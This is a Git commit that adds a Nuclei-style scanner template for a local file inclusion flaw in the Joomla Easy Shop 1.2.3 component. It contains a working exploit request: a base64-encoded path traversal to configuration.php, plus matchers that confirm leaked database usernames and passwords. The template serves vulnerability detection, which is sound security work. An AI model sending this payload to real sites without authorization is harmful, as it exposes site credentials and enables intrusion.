Merge pull request #9192 from projectdiscovery/joomla-easyshop-lfi

Create joomla-easyshop-lfi.yaml
2024-02-22 17:39:03 +05:30 · 2024-02-22 17:39:03 +05:30 · ac433e7994
parent 130161fbb7 04c1da27b8
commit ac433e7994
1 changed files with 28 additions and 0 deletions
--- a/http/vulnerabilities/joomla/joomla-easyshop-lfi.yaml
+++ b/http/vulnerabilities/joomla/joomla-easyshop-lfi.yaml
@ -0,0 +1,28 @@
+id: joomla-easyshop-lfi
+
+info:
+  name: Joomla! Component Easy Shop 1.2.3 - Local File Inclusion
+  author: ritikchaddha
+  severity: high
+  description: |
+    The Joomla! component Easy Shop version 1.2.3 is vulnerable to Local File Inclusion (LFI) attacks.
+  reference:
+    - https://blog.csdn.net/weixin_42628854/article/details/136036109
+  metadata:
+    verified: true
+    max-request: 1
+    shodan-query: http.component:"Joomla"
+  tags: cnvd,cnvd2023,file-upload
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/index.php?option=com_easyshop&task=ajax.loadImage&file=Li4vLi4vY29uZmlndXJhdGlvbi5waHA="
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'contains_all(body, "<?php", "class JConfig {")'
+          - 'contains_any(body, "$user", "$password", "$dbtype")'
+          - 'status_code == 200'
+        condition: and